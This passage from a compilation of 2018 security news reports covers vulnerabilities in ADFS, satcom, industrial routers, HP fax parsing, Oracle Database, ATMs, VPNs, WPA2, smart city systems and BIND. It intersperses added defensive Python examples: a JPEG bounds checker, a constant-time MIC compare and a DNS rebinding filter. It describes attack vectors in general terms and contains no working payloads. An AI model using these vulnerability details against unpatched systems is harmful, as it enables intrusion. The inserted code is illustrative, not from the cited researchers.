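Without the binding, `demo(False)` shows that a validly signed context issued for one user completes another user's login; with the username inside the signed data, `demo(True)` shows the same context being refused while the legitimate login still succeeds. The signature check on its own is not the problem, as `forged_context` illustrates: what was missing was the link between the signed token and the identity being logged in.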

The flaw was discovered by researcher Andrew Lee in March 2018. Okta first attempted to mitigate the problem within its own ADFS Agent, but found this was not possible. In April, Okta reported the issue to Microsoft, who confirmed they were able to reproduce the issue within 4 days.

Microsoft set its remediation process in motion and set a patch date in early May. In July it filed CVE-2018-8340. It arranged to release its fix on Patch Tuesday (August 14, 2018), and Okta published the vulnerability details.

Okta told SecurityWeek that it has seen nothing to suggest that this flaw has been used against any of its customers.


Researcher Finds Hundreds of Planes Exposed to Remote Attacks
13.8.2018 securityweek
Vulnerebility

Hacking airplanes via satcom systems

A researcher has discovered that hundreds of airplanes from several airlines could have been hacked remotely from the ground through vulnerabilities in satellite communications systems.

Back in 2014, IOActive Principal Security Consultant Ruben Santamarta published a research paper describing theoretical attack scenarios on satellite communications. The expert resumed his research in November 2017, after taking a look at the in-flight entertainment system during a Norwegian flight.

After passively collecting traffic from the airplane’s Wi-Fi network, Santamarta noticed that several commonly used services, such as Telnet, HTTP and FTP, were available for certain IP addresses, and some interfaces associated with the plane’s on-board satellite communications (satcom) modems were accessible without authentication.

Further research into satcom systems revealed the existence of various types of vulnerabilities, including insecure protocols, backdoors, and improper configuration that could allow attackers to take control of affected devices. The expert disclosed his findings this week at the Black Hat security conference in Las Vegas.

Specifically, Santamarta has found security holes that can be exploited by remote hackers to take control of satcom equipment on commercial flights, earth stations on ships, and earth stations used by the U.S. military in conflict zones.

In the case of commercial aviation, the researcher discovered that hackers could have targeted, from the ground, hundreds of planes from Southwest, Norwegian and Icelandair.

Worryingly, in the case of one airplane, the researcher discovered that its satcom terminal had already been targeted from the ground by the Gafgyt IoT botnet via a compromised router.

“There is no indication that this malware family either had success accessing the SATCOM terminal on any aircraft or that it was specifically targeting airborne routers, so we should consider this situation as a ‘collateral damage’. However, the astonishing fact is that this botnet was, inadvertently, performing brute-force attacks against SATCOM modems located onboard an in-flight aircraft,” Santamarta wrote in his research paper.

Even more worrying is the fact that one of the vessels analyzed by the expert already had its Antenna Control Unit (ACU) infected with the Mirai malware.

In the military and maritime sectors, remote attacks on satcom systems could pose a safety risk. For instance, in the case of ships, attackers could disrupt communications and they can conduct cyber-physical attacks using high-intensity radiated field (HIRF), a radio-frequency energy strong enough to adversely affect living organisms and electronic devices. In the case of the military, malicious actors could abuse satcom systems to pinpoint the location of military units, disrupt communications, and conduct HIRF attacks.

On the other hand, remote attacks on an aircraft’s satcom equipment do not pose a safety risk due to the isolation between various systems on board. However, a hacker could still intercept or modify in-flight Wi-Fi traffic, and hijack devices belonging to passengers and crew.

IOActive disclosed the findings to affected vendors and organizations such as US-CERT and ICS-CERT, and while the aforementioned airlines and some of the affected equipment manufacturers have taken steps to address the issues, others have not been very open to collaboration.

In addition to Santamarta’s presentation at Black Hat, IOActive Senior Security Consultant Josep Pi Rodriguez will give a talk on Sunday at the DEF CON conference on vulnerabilities discovered in the Extreme Networks embedded WingOS.

According to the researcher, the flaws he has identified can be exploited to hack millions of devices found in aircraft, government agencies, and smart cities.


Critical Flaws Found in NetComm Industrial Routers
13.8.2018 securityweek ICS 
Vulnerebility

An industrial router made by Australian telecommunications equipment company NetComm Wireless is affected by several serious vulnerabilities that can be exploited remotely to take control of affected devices.

According to an advisory published last week by ICS-CERT, NetComm 4G LTE Light industrial M2M routers running firmware version 2.0.29.11 and prior are impacted by four vulnerabilities. The list includes information disclosure, cross-site scripting (XSS) and cross-site request forgery (CSRF) issues that have been assigned the CVE identifiers CVE-2018-14782 through CVE-2018-14785.

Researcher Aditya K. Sood, who has been credited with finding the vulnerabilities, told SecurityWeek that one of the security holes allows an unauthenticated attacker to access information about a device’s web server.

A CSRF vulnerability, present due to failure to enforce a token mechanism, can be exploited by a remote attacker to perform various actions, including to change the password to the router’s web interface.

An XSS flaw is caused by the failure of the application hosted on the embedded web server to implement input filtering and sanitization.

“Any arbitrary value passed by the remote user was processed and rendered in the application. As a result, the payload passed as a value gets executed in the browser. The attacker could have stolen session information or could have executed malicious code via the NetComm router web interface,” Sood explained.

The last vulnerability is an information disclosure issue that can be exploited by an attacker to obtain details on the router’s components.


The CSRF and XSS flaws have been classified by ICS-CERT as “critical,” while the information disclosure issues are said to be “high severity.” CSRF and XSS flaws typically require the targeted user to click on a link.

The flaws can be exploited remotely from the Internet. A search revealed the existence of hundreds of devices exposed to attacks, Sood told SecurityWeek.

“The vulnerabilities combined with other sets of attacks and specific command execution to alter the configuration could result in compromising the device at the system level,” the researcher explained.

The expert reported his findings via ICS-CERT in October 2017. NetComm appears to have released a firmware update that patches the security holes in mid-May 2018.


Faxploit – Critical flaws potentially expose millions of HP OfficeJet Printers to hack
13.8.2018 securityaffairs
Vulnerebility

A vulnerability in HP OfficeJet all-in-one inkjet printers can be exploited by attackers to gain control of the printer and use it as an entry point into the network environment.
A critical vulnerability potentially exposes millions of HP OfficeJet printers to attack; according to the experts at Check Point, attackers only need to send a fax to a vulnerable printer.

The researchers discovered two critical vulnerabilities in HP’s implementation of a widely used fax protocol, which is present in all of its OfficeJet all-in-one inkjet printers.

The vulnerabilities affect the HP all-in-one printers that support Group 3 (G3) fax protocols that are part of the ITU T.30 standard for sending and receiving color faxes.

Check Point experts reported the flaws to HP and shared details of the two vulnerabilities at the DEF CON conference.

The researchers devised an attack technique dubbed Faxploit; they demonstrated that once attackers have compromised a fax machine, they could leverage the NSA exploit EternalBlue for lateral movement.

“The below diagram shows the Faxploit attack flow, following which a threat actor could then move laterally across your network to access your organization’s most confidential information.” reads the blog post published by CheckPoint Security.

“The crucial element to notice is that whereas most attacks today penetrate through an internet connection to enter an organization’s network, using this vulnerability in the fax protocol even a network that is completely detached would be vulnerable. This is due to the attack being channeled through a route that until now was considered to be secure and need not have protection layers applied.”


The experts explained that attackers could run several types of attack, such as stealing documents or tampering with fax content by replacing received documents with altered versions.

The fax flaws could be exploited by attackers during the receiving handshake.

“We could reach this vulnerability by sending a huge XML (> 2GB) to the printer over TCP port 53048 thus triggering a stack-based buffer overflow. Exploiting this vulnerability then gave us full control over the printer, meaning that we could use this as a debugging vulnerability,” researchers wrote.

The expert explained that when a fax is sent to the OfficeJet printer, the TIFF image format is used. The sender’s fax broadcasts the .TIFF meta-data for the receiving fax machine to set transmission parameters such as page sizes. According to the ITU T.30 standard protocol, the receiver’s fax has to analyze the meta-data for data continuity and sanitation, but the experts discovered that when a color fax is sent, the sending/receiving machines use the .JPG image format instead of .TIFF.

“When we examined the code that handles the colourful faxes we found out another good finding: the received data is stored to a .jpg file without any check. In contrast to the .tiff case in which the headers are built by the receiver, in the .jpg case we controlled the entire file,” researchers noted. “When the target printer receives a colourful fax it simply dumps its content into a .jpg file (“%s/jfxp_temp%d_%d.jpg” to be precise), without any sanitation checks.”

The vulnerable OfficeJet printers parse the fax data with a custom JPEG parser: instead of using libjpeg, the developers implemented their own.

The experts examined the parser and discovered two stack-based buffer overflow vulnerabilities.
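As an added example (not HP's parser or Check Point's code), the walker below shows the bounds checks a hand-written JPEG parser needs before it copies segment payloads into fixed-size buffers: a length field must be at least 2, must not run past the end of the received data, and must not exceed the destination buffer. The sample JPEG bytes, the `max_payload` parameter that stands in for a fixed buffer size, and the function names are constructed for the illustration.

```python
"""Walking JPEG marker segments with explicit bounds checks. Added example, not
HP's parser: it shows the length validation a custom JPEG parser must perform
before copying segment payloads into fixed-size buffers. Sample bytes below are
constructed, not taken from a real fax."""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))

# Constructed minimal JPEG header: SOI, a 16-byte APP0/JFIF segment, EOI.
GOOD_JPEG = (bytes.fromhex("FFD8") + bytes.fromhex("FFE00010") + b"JFIF\x00"
             + bytes([1, 1, 0, 0, 1, 0, 1, 0, 0]) + bytes.fromhex("FFD9"))
# Constructed malformed input: APP0 segment claims 65535 bytes but only 4 follow.
OVERSIZED_SEGMENT = bytes.fromhex("FFD8") + bytes.fromhex("FFE0FFFF") + b"JFIF"
# Constructed malformed input: length field below the 2-byte minimum.
UNDERSIZED_LENGTH = bytes.fromhex("FFD8") + bytes.fromhex("FFDB0001") + bytes.fromhex("FFD9")


def parse_jpeg_segments(data, max_payload=65533):
    """Return [(marker, payload), ...] up to SOS or EOI, or raise ValueError.
    max_payload models the capacity of a fixed-size destination buffer."""
    if len(data) < 2 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("missing SOI marker")
    pos, segments = 2, []
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:              # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((marker, b""))
            pos += 2
            if marker == EOI:
                return segments
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated length field at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:                  # length counts its own two bytes
            raise ValueError("segment length %d below minimum" % length)
        end = pos + 2 + length
        if end > len(data):             # the check an overflowing parser lacks
            raise ValueError("segment length %d exceeds remaining %d bytes"
                             % (length, len(data) - pos - 2))
        payload = data[pos + 4:end]
        if len(payload) > max_payload:  # destination buffer capacity
            raise ValueError("payload of %d bytes exceeds buffer of %d"
                             % (len(payload), max_payload))
        segments.append((marker, payload))
        if marker == SOS:               # entropy-coded scan follows; header walk ends
            return segments
        pos = end
    raise ValueError("input ended without SOS or EOI")


def is_well_formed(data, max_payload=65533):
    """True if every segment header passes the checks above."""
    try:
        parse_jpeg_segments(data, max_payload)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name, blob in [("good", GOOD_JPEG), ("oversized", OVERSIZED_SEGMENT),
                       ("undersized", UNDERSIZED_LENGTH)]:
        print(name, "well-formed:", is_well_formed(blob))
```

The walker stops at SOS because the entropy-coded scan that follows is not length-prefixed and needs a different decoder; every header segment before it, however, is validated against both the received data and the buffer it is about to be copied into, which is the point a received-data-to-file or received-data-to-stack path without checks misses.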

HP also released security patches for both vulnerabilities tracked as CVE-2018-5925 and CVE-2018-5924.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.


Oracle warns of CVE-2018-3110 Critical Vulnerability in Oracle Database product, patch it now!
13.8.2018 securityaffairs
Vulnerebility

Last week Oracle disclosed a critical vulnerability in its Oracle Database product; the issue, tracked as CVE-2018-3110, has received a CVSS score of 9.9.
On Friday, Oracle released security patches to address the critical vulnerability affecting its Database product, and the company is urging customers to install them as soon as possible.

The vulnerability resides in the Java VM component of Oracle Database Server; a remote authenticated attacker can exploit it to take complete control of the product and obtain shell access to the underlying server.

The vulnerability, tracked as CVE-2018-3110, affects Oracle Database 11.2.0.4, 12.2.0.1, 12.1.0.2 on Windows and 12.1.0.2 running on Unix or Linux.

“Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18.” reads the security advisory published by Oracle “Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Java VM. While the vulnerability is in Java VM, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java VM. “

Version 12.1.0.2 on both Windows and Unix/Linux systems was already addressed with the Oracle July 2018 CPU.

“Due to the nature of this vulnerability, Oracle recommends that customers apply these patches as soon as possible.” reads the blog post published by Oracle.

“This means that:

Customers running Oracle Database versions 11.2.0.4 and 12.2.0.1 on Windows should apply the patches provided by the Security Alert.
Customers running version 12.1.0.2 on Windows or any version of the database on Linux or Unix should apply the July 2018 Critical Patch Update if they have not already done so.”
Oracle “strongly recommends that customers take action without delay.”


Critical Vulnerability Patched in Oracle Database
13.8.2018 securityweek
Vulnerebility

Oracle informed customers late on Friday that its Database product is affected by a critical vulnerability. Patches have been released and users have been advised to install them as soon as possible.

The security hole, tracked as CVE-2018-3110 with a CVSS score of 9.9, affects Oracle Database 11.2.0.4 and 12.2.0.1 on Windows. Version 12.1.0.2 on Windows and Database running on Unix or Linux are also impacted, but patches for these versions were included in Oracle’s July 2018 CPU.

The vulnerability, present in the Java VM component of Oracle Database Server, can be exploited to take complete control of the product and obtain shell access to the underlying server.

However, the vendor noted that the weakness cannot be exploited remotely without authentication, and that the fix does not apply to client-only installations (i.e. installations that do not have Database Server).

“Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Java VM. While the vulnerability is in Java VM, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java VM,” Oracle said in its advisory.

The company “strongly recommends that customers take action without delay” to address CVE-2018-3110, which has led some to wonder if Oracle believes that the risk of exploitation is high.



Flaws in ATM Dispenser Controllers Allowed Hackers to Steal Cash
10.8.2018 securityweek
Vulnerebility

ATM hacking exploits cash dispenser controller vulnerabilities

Researchers have disclosed the details of two serious vulnerabilities affecting ATM currency dispensers made by NCR. The flaws have been patched, but they could have been exploited to install outdated firmware and get ATMs to dispense cash.

Positive Technologies experts Vladimir Kononovich and Alexey Stennikov have conducted a successful black box attack against the NCR S1 and S2 cash dispenser controllers. In these types of attacks, the attacker only sees inputs and outputs, without having any knowledge of the system’s internal workings.

The method, which the researchers described as a “logical attack,” requires physical access to the targeted device. In this particular case, an attacker could have leveraged the poor physical security of the targeted dispenser controller to connect to it, install vulnerable firmware, and issue commands that would instruct the machine to dispense cash.

The experts disclosed their findings this week at the Black Hat security conference in Las Vegas.

Two different security holes have been found that allow an attacker to roll back the firmware to an older, vulnerable version.

One of them is CVE-2017-17668, which affects the S1 controller, and the other is CVE-2018-5717, which affects the S2 controller.

The flaws are similar and they are both related to insufficient protection of the memory write mechanism. They can be exploited by an unauthenticated attacker to execute arbitrary code, bypass the firmware anti-rollback mechanism, and install firmware containing known vulnerabilities, according to Positive Technologies.

“Our research indicated that not all requests from the ATM computer to the dispenser were encrypted. Instead, encryption was applied only to requests deemed critical by the manufacturer, such as dispensing cash. But some of the so-called non-critical requests can be just as dangerous,” said Alexey Stennikov, Head of Hardware Security Analysis at Positive Technologies.

The researchers notified NCR of their findings and the vendor released critical firmware updates in February that should provide better protection against black box attacks. The update should address the firmware rollback vulnerability and it adds an extra layer of protection for physical authentication mechanisms.

“The physical authentication mechanism used to authorize encrypted communications to the dispenser has been strengthened to add protection against an attacker using endoscope technology in an attempt to manipulate dispenser electronics from outside the safe. Additionally, further authentication mechanisms have been added as configuration options,” NCR said in its advisory.


Security expert discovered a bug that affects million Kaspersky VPN users
10.8.2018 securityaffairs
Vulnerebility

A security issue exists in Kaspersky VPN <=v1.4.0.216 which leaks your DNS Address even after you’re connected to any virtual server. (Tested on Android 8.1.0)
What is a DNS leak?

In this context, with the term “DNS leak” we indicate an unencrypted DNS query sent by your system OUTSIDE the established VPN tunnel.

Kaspersky VPN is one of the most trusted VPNs, with more than 1,000,000 downloads in the official Google Play Store; however, it was observed that when it connects to any random virtual server, it still leaks your actual DNS address.

The expert Dhiraj Mishra, who discovered the flaw, reported it to Kaspersky via HackerOne.

Mishra also published a step-by-step guide to reproduce the problem:

Visit IPleak (Note your actual DNS address).
Now, connect to any random virtual server using Kaspersky VPN.
Once you are successfully connected, navigate to IPleak you will observe that the DNS address still remains the same.

The expert explained that the data leak could threaten the privacy of end-users that want to remain anonymous on the internet.

“I believe this leaks the trace’s of an end user, who wants to remain anonymous on the internet. I reported this vulnerability on Apr 21st (4 months ago) via H1, and a fix was pushed for same but no bounty was awarded.” states Mishra.

The expert reported this vulnerability to Kaspersky on Apr 21st via HackerOne, and a fix was pushed for the issue.

Unfortunately, no bounty was awarded to the researcher under the company’s bug bounty program.


Researchers Find Flaws in WPA2's 4-way Handshake Implementations
9.8.2018 securityweek
Vulnerebility

Researchers have discovered several security vulnerabilities in implementations of the Wi-Fi Protected Access II (WPA2) 4-way handshake, which is used by nearly all protected Wi-Fi networks.

The discovery was the result of simulating cryptographic primitives during symbolic execution for the analysis of security protocol implementations, KU Leuven researchers Mathy Vanhoef and Frank Piessens explain in a recently published whitepaper (PDF).

By applying the technique on three client-side implementations of WPA2’s 4-way handshake, the researchers discovered timing side-channels when verifying authentication tags, a denial-of-service attack, a stack-based buffer overflow, and a non-trivial decryption oracle.

Through symbolic execution, the researchers claim, one aims to exhaustively explore all code paths of a program by running on symbolic inputs instead of concrete ones. For their experiments, the researchers implemented the techniques on top of the KLEE symbolic execution engine (they modified the engine to handle cryptographic primitives).

Of the three tested implementations, two were found susceptible to trivial timing side-channels, because they verify authentication tags using timing-unsafe memory compares.
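To make the timing-unsafe compare concrete, here is an added example (not code from the paper or from any supplicant) that computes the MIC of an EAPOL-Key message with HMAC-SHA1 truncated to 128 bits, as WPA2 does for key descriptor version 2, and verifies it two ways: with an early-exit byte loop that reports how many bytes it examined before giving up, and with a constant-time compare. The KCK value, the frame bytes and the function names are constructed for the illustration.

```python
"""Verifying a WPA2 EAPOL-Key MIC: a timing-unsafe byte compare beside a
constant-time one. Added example, not from the KU Leuven paper or from any
supplicant; the KCK and the EAPOL frame bytes are constructed sample values."""
import hashlib
import hmac

# Constructed 16-byte Key Confirmation Key (KCK); in WPA2 it is derived from the PTK.
KCK = bytes.fromhex("0123456789abcdef0123456789abcdef")

# Constructed EAPOL-Key message body with the 16-byte MIC field zeroed, which is
# how the frame looks when the MIC is computed (the full frame layout is not reproduced).
SAMPLE_FRAME = (b"\x02\x03\x00\x5f\x02\x01\x3a" + b"\x00" * 16
                + b"\x00" * 16 + b"constructed-key-data")


def eapol_mic(kck, frame_with_zero_mic):
    """Key descriptor version 2 (used with CCMP): HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def verify_mic_unsafe(kck, frame, received_mic):
    """Byte-by-byte compare that returns at the first mismatch. The number of
    iterations, and so the time taken, depends on how many leading bytes of the
    received MIC are correct. Returns (accepted, bytes_examined)."""
    expected = eapol_mic(kck, frame)
    if len(expected) != len(received_mic):
        return False, 0
    examined = 0
    for a, b in zip(expected, received_mic):
        examined += 1
        if a != b:
            return False, examined
    return True, examined


def verify_mic_safe(kck, frame, received_mic):
    """Constant-time compare: runtime does not depend on where the bytes differ."""
    return hmac.compare_digest(eapol_mic(kck, frame), received_mic)


def sample_results():
    """Run both verifiers on a correct MIC, one with only the first three bytes
    correct, and one wrong from the first byte."""
    good = eapol_mic(KCK, SAMPLE_FRAME)
    partial = good[:3] + bytes((good[3] ^ 0xFF,)) + good[4:]
    wrong_first = bytes((good[0] ^ 0x01,)) + good[1:]
    return {
        "safe_good": verify_mic_safe(KCK, SAMPLE_FRAME, good),
        "safe_partial": verify_mic_safe(KCK, SAMPLE_FRAME, partial),
        "unsafe_good": verify_mic_unsafe(KCK, SAMPLE_FRAME, good),
        "unsafe_partial": verify_mic_unsafe(KCK, SAMPLE_FRAME, partial),
        "unsafe_wrong_first": verify_mic_unsafe(KCK, SAMPLE_FRAME, wrong_first),
    }


if __name__ == "__main__":
    for name, value in sample_results().items():
        print("%-20s %s" % (name, value))
```

Both verifiers reach the same accept/reject decisions; the difference is only in `bytes_examined`, which grows with the length of the correct prefix and is exactly what a timing measurement exposes. The fix the authors point at is the constant-time path, which in Python is `hmac.compare_digest` and in C a compare that touches every byte regardless of mismatches.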

The researchers found a denial of service in Intel’s iwd daemon (iNet wireless daemon) and a stack-based buffer overflow (in code that processes decrypted data) in MediaTek’s implementation, both of which can be triggered by a malicious access point (AP). The AES key unwrap algorithm was also found to be incorrectly implemented in MediaTek’s code.

Furthermore, wpa_supplicant (a cross-platform supplicant with support for WEP, WPA and WPA2 (IEEE 802.11i)) was found vulnerable to a non-trivial decryption oracle caused by processing decrypted but unauthenticated data. Tracked as CVE-2018-14526, the bug can be exploited to recover sensitive information.

“This decryption oracle can be exploited when the victim connects to a WPA2 network using the old TKIP encryption algorithm. It can be abused to decrypt the group key transported in message 3 of the 4-way handshake,” the researchers note.

The attack, however, is only possible if WPA2 is used and if the client selects TKIP as the pairwise cipher, so that the RC4 stream cipher is used to encrypt the key data field (if CCMP is selected, AES is used to protect the key data field). Both conditions are met when the Wi-Fi network uses WPA2 and only supports TKIP (in 2016, 20% of protected Wi-Fi networks used this configuration).

The flaw allows an attacker to decrypt the group key transported in message 3 of WPA2’s 4-way handshake and use it to inject both broadcast and unicast traffic. Furthermore, the key could be used to decrypt unicast and broadcast traffic, the research paper claims.

“We successfully applied symbolic execution to client-side implementations of the 4-way handshake of WPA2, by simulating cryptographic primitives, and constraining parts of the symbolic input to prevent excessive state explosions. This revealed memory corruptions in code that processes decrypted data, uncovered insecure implementations of cryptographic primitives, and even revealed a decryption oracle,” the researchers note.

Earlier this week developers of the popular password cracking tool Hashcat identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.


Flaws in Smart City Systems Can Allow Hackers to Cause Panic
9.8.2018 securityweek
Vulnerebility

Smart city - Credits: JCT 600 https://www.jct600.co.uk/blog/future-of-motoring/what-will-motoring-look-like-70-years-from-now/

Critical vulnerabilities discovered in smart city systems from several vendors can allow malicious actors to perform various actions that could lead to widespread panic, researchers warn.

The world’s major cities are increasingly reliant on smart technologies, including for traffic management, disaster detection and response, and remotely controlling utilities. These systems communicate via protocols such as 4G, ZigBee and Wi-Fi.

Following the recent accidental false missile alert in Hawaii, experts at Threatcare and IBM X-Force Red have decided to join forces and analyze smart city technologies to see if they are affected by any vulnerabilities that could be exploited to intentionally cause panic.

Researchers from the two companies analyzed products from Echelon, Libelium and Battelle. Their tests led to the discovery of 17 previously unknown vulnerabilities across four types of smart city products, including eight security holes described as “critical” and six as “high severity.”

In the case of Echelon, the companies tested i.LON 100 and 600 routers, which allow organizations to monitor and control LonWorks devices such as pumps, valves, motors, sensors and lights. They also analyzed the vendor’s SmartServer products, described as a “versatile controller, router, and smart energy manager that connects control devices to IP-based applications such as building automation, enterprise energy management, demand response programs, and high-value remote asset management programs.”

A total of five vulnerabilities were discovered in these systems, including two critical flaws that allow authentication bypass, as well as default credentials, plaintext passwords, and a lack of encrypted communications. ICS-CERT recently published an advisory describing some of the issues identified by IBM and Threatcare.

In the case of Libelium, which specializes in hardware for wireless sensor networks, researchers analyzed Meshlium, an IoT gateway designed for connecting sensors to any cloud platform. Four distinct instances of a pre-authentication shell injection flaw were discovered in the product, and they have all been classified as “critical.”

As for Battelle, a global research and development organization, IBM and Threatcare analyzed two versions of its V2I (vehicle-to-infrastructure) Hub product, which is used for communicating data from traffic signal controllers to connected vehicles.

The list of vulnerabilities found in these systems includes SQL injection, hardcoded passwords, unprotected sensitive functionality, cross-site scripting (XSS) flaws, and various API-related issues. A majority of these security holes have been assigned either a “critical” or “high severity” rating.

All the affected vendors have been notified and they have addressed the vulnerabilities.

Battelle has clarified that V2I Hub is a 2.5-year project that it’s working on for the Federal Highway Administration. The project is ongoing – it’s expected to be finished at the end of September – and it has only been deployed for testing purposes. Battelle told SecurityWeek that it fixed the flaws found by IBM in early July.

However, the discovery of these basic security holes shows that smart city systems are highly exposed to cyberattacks.

While there is no evidence of malicious attacks exploiting the vulnerabilities found as part of this research project, the companies warned that the risks are significant.

Worryingly, online searches conducted using Shodan and Censys showed that there are tens or hundreds of vulnerable systems accessible directly from the Internet. Some of them have been found to belong to a European country that uses vulnerable devices to detect radiation, and a major U.S. city that relies on them for traffic monitoring.

“According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic,” researchers said.

In a theoretical attack scenario described by the experts, an attacker exploits the vulnerabilities to manipulate data from water level sensors to indicate a flood, which could create panic. In addition, hackers could make the water level appear normal during a flood.

Hackers could also cause mass panic by manipulating data from radiation sensors in order to trigger radiation leak warnings.

Hijacking traffic systems can also have serious consequences. Attackers can cause chaos by controlling traffic signals, and create additional panic by setting off building and emergency alarms, and triggering gunshot sensors.


Flaw in BIND Security Feature Allows DoS Attacks
9.8.2018 securityweek
Vulnerebility

The Internet Systems Consortium (ISC) revealed on Wednesday that the BIND DNS software is affected by a serious vulnerability that can be exploited for denial-of-service (DoS) attacks.

The flaw, discovered by Tony Finch of the University of Cambridge and tracked as CVE-2018-5740, can be exploited remotely and it has been assigned a CVSS score of 7.5, which makes it “high severity.”

However, the vulnerability only impacts servers on which a feature called “deny-answer-aliases” has been enabled. The feature is disabled by default.

The “deny-answer-aliases” feature is designed to help recursive server operators protect users against DNS rebinding attacks. In such an attack, a remote attacker abuses the targeted user’s web browser to communicate directly with devices on the local network and exploit any flaws they might have.
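As an added illustration (this is not ISC code, and it does not model the assertion failure itself), the following Python shows the policy that a rebinding filter such as BIND’s deny-answer-aliases enforces on a recursive server: an answer for an outside name must not be a CNAME or DNAME alias into the operator’s own zones. The model also covers the companion deny-answer-addresses check (A/AAAA answers inside local address ranges) and an except-from list, because the two directives are normally deployed together; the zone names, address ranges and resource records are constructed sample data, not taken from the advisory.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Sequence


@dataclass(frozen=True)
class RR:
    """One resource record from an answer section (constructed sample data)."""
    name: str    # owner name, e.g. "evil.example."
    rtype: str   # "A", "AAAA", "CNAME" or "DNAME"
    rdata: str   # IP address for A/AAAA, target name for CNAME/DNAME


def _norm(name: str) -> str:
    return name.rstrip(".").lower()


def name_in_zones(name: str, zones: Iterable[str]) -> bool:
    """True if name equals, or lies below, one of the listed zone names."""
    n = _norm(name)
    return any(n == _norm(z) or n.endswith("." + _norm(z)) for z in zones)


class RebindingFilter:
    """Answer filter modelling deny-answer-aliases / deny-answer-addresses."""

    def __init__(self, alias_zones: Sequence[str] = (), address_nets: Sequence[str] = (),
                 except_from: Sequence[str] = ()):
        self.alias_zones = tuple(alias_zones)                                # deny-answer-aliases { ... }
        self.nets = tuple(ipaddress.ip_network(n) for n in address_nets)    # deny-answer-addresses { ... }
        self.except_from = tuple(except_from)                                # except-from { ... }

    def offending(self, qname: str, answers: Iterable[RR]) -> List[RR]:
        """Records that the policy would reject for a query about qname."""
        # Names under the operator's own zones may legitimately alias or
        # resolve to internal targets, so they are exempt.
        if name_in_zones(qname, self.except_from):
            return []
        bad = []
        for rr in answers:
            if rr.rtype in ("CNAME", "DNAME") and name_in_zones(rr.rdata, self.alias_zones):
                bad.append(rr)
            elif rr.rtype in ("A", "AAAA"):
                addr = ipaddress.ip_address(rr.rdata)
                if any(addr in net for net in self.nets):
                    bad.append(rr)
        return bad

    def accept(self, qname: str, answers: Iterable[RR]) -> bool:
        return not self.offending(qname, answers)


if __name__ == "__main__":
    f = RebindingFilter(alias_zones=["corp.example."],
                        address_nets=["10.0.0.0/8", "192.168.0.0/16", "127.0.0.0/8"],
                        except_from=["corp.example."])
    cases = {
        "alias into local zone": ("evil.example.", [RR("evil.example.", "CNAME", "intranet.corp.example.")]),
        "direct private address": ("evil.example.", [RR("evil.example.", "A", "192.168.1.10")]),
        "public address": ("evil.example.", [RR("evil.example.", "A", "203.0.113.5")]),
        "own zone, private address": ("www.corp.example.", [RR("www.corp.example.", "A", "10.1.2.3")]),
    }
    for label, (qname, rrs) in cases.items():
        print(f"{label:28s} -> {'accept' if f.accept(qname, rrs) else 'REJECT'}")
```

The two rejected cases are exactly the rebinding shapes the feature exists to stop: an attacker-controlled name that aliases into a trusted zone, or that answers with an address on the victim’s own network. The except-from list matters in practice, because without it the operator’s own zones, which legitimately resolve to internal addresses, would be filtered too.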

“Accidental or deliberate triggering of this defect will cause an INSIST assertion failure in named, causing the named process to stop execution and resulting in denial of service to clients,” ISC wrote in its advisory.

The security hole impacts BIND versions 9.7.0 through 9.8.8, 9.9.0 through 9.9.13, 9.10.0 through 9.10.8, 9.11.0 through 9.11.4, 9.12.0 through 9.12.2, and 9.13.0 through 9.13.2. A patch is included in versions 9.9.13-P1, 9.10.8-P1, 9.11.4-P1 and 9.12.2-P1. As a workaround, ISC suggests disabling the problematic feature if it has been used.

“Most operators will not need to make any changes unless they are using the ‘deny-answer-aliases’ feature. ‘deny-answer-aliases’ is off by default; only configurations which explicitly enable it can be affected by this defect,” ISC said.

The organization says it’s not aware of any instances where this vulnerability has been exploited for malicious purposes. Potentially affected users were notified of the flaw in advance, on July 31.


Researchers Find Flaw in WhatsApp
8.8.2018 securityweek
Vulnerebility

Researchers at Israeli cybersecurity firm CheckPoint said Wednesday they had found a flaw in WhatsApp that could allow hackers to modify and send fake messages in the popular social messaging app.

CheckPoint said the vulnerability gives a hacker the possibility "to intercept and manipulate messages sent by those in a group or private conversation" as well as "create and spread misinformation".

The report of the flaw comes as the Facebook-owned app is coming under increasing scrutiny as a means of spreading misinformation, due to its popularity and the convenience of forwarding messages to groups.

Last month, the app announced limits on forwarding messages following threats of action by the Indian government, where more than 20 people accused of child kidnapping and other crimes in viral WhatsApp messages were killed by mobs.

WhatsApp said in a statement: "We carefully reviewed this issue and it's the equivalent of altering an email to make it look like something a person never wrote."

However, WhatsApp said: "This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp."

The app noted it recently placed a limit on forwarding content, added a label to forwarded messages, and made a series of changes to group chats in order to tackle the challenge of misinformation.

Founded in 2009 and purchased by Facebook in 2014, WhatsApp said that at the beginning of the year it had more than 1.5 billion users who exchanged 65 billion messages per day.


Serious OpenEMR Flaws Expose Medical Records
8.8.2018 securityweek
Vulnerebility

